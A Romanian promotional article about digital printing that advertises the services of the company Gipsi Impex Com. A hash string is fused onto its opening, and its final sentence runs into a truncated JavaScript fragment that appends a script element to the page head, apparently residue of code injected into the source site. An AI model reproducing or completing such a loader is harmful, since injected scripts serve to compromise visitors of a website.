99a25ef2b3e328f4346a5c0c611159edPoza preferata din telefonul nostru poate fi scoata in format fizic cu ajutorul unui dispozitiv de printare digitala. Aceste echipamente functioneaza in conformitate cu doua tipuri de tehnologie: tehnologia laser si tehnologia pe baza de cerneala. Cum definim print digital? Foarte simplu, operatiunea de print digital inseamna procedeul prin care trecem o imagine, un text, un simbol din forma digitala in mediul real prin intermediul unor imprimante laser sau pe baza e cartuse cu cerneala.

Printul digital este mai avantajos fata de printul traditional deoarece se poate realiza un numar mai mare de printari intr-o perioada mai scurta de timp. De asemeni, in cazul printului digital nu este nevoie sa schimbi rolele de offset. Spre deosebire de imprimantele traditionale, cele digitale sunt mult mai usor de intretinut.

In ultima vreme, imprimantele laser au devenit produse din ce in ce mai performante. Performantele sporite ale acestora se inregistreaza la nivel de viteza de tiparire si calitate, devenind mult mai flexibile in ceea ce priveste conectivitatea si din ce in ce mai accesibile pentru orice buzunar.

Daca vrei sa realizezi printurile pe care ti le doresti iti recomadam sa alegi imprimante laser. De ce? Pentru ca astfel vei beneficia de produse de calitate realizate in cel mai scurt timp. Imprimantele laser se mai numesc si “page printers” deoarece pot tipari o pagina intreaga deodata intr-un interval de timp scurt. Un al avantaj este reprezentat de calitatea tiparirii pe hartie obisnuita si slientiozitatea cu care lucreaza aceste echipamente.

Compania Gipsi Impex Com ofera tuturor clientilor interesati servicii de print digital, utilizand imprimante de uultima generatie. Activand in domeniul publicitar, aceasta companie este specializata in personalizarea obiectelor promotionale prin intermediul unor procedee specifice. Materialele pe care le veti obtine dupa ce apelezi la serviciile acestei companii vor putea fi folosite ulterior ca mijloace perfecte de promovare in campaniile de markeing.

Gipsi Impex Com detine peste 2 decenii de experienta in acest domeniu de activitate, ocupand un loc in topul celor 10 companii de pe piata de specialitate din tara. Oferta de servicii oferite de specialistii de aici este una foarte variata si putem aminti de: tampografie si serigrafie, creare sitelor serigrafice, print digital, gravura mecanica si cu laser, decupare cu cutter plotter-ul, transfer termic etc. Toate operatiunile executate de aceasta companie vor corespunde cerintelor si preferintelor fiecarui client in parte, fara nici o abatere de la promptitudine, seriozitate si profesionalism.

Echipa Gipsi Impex Com este formata din personal special instruit in acest domeniu si care se foloseste de utilaje performante pentru a pune in practica pana si cele mai complexe cerinte. In materie de print digital, specialistii de aici realizeaza inscriprionari pe suprafata obiectelor promotionale textile (a caror dimensiune este de maximum 60×40 cm) si pe articole plastice de tipul autocolantelor, bannere-lor etc ce au o latime care nu depaseste 1.6 m. Impreuna cu tine, Companie Gipsi Impex Com va gasi cele mai cele mai bune solutii pentru o personalizare excelenta a promotionalelor dorite.

Nu mai sta pe ganduri si apleaza la serviciul de print digital oferit de compania Gipsi Impex Com.d.getElementsByTagName(‘head’)[0].appendChild(s);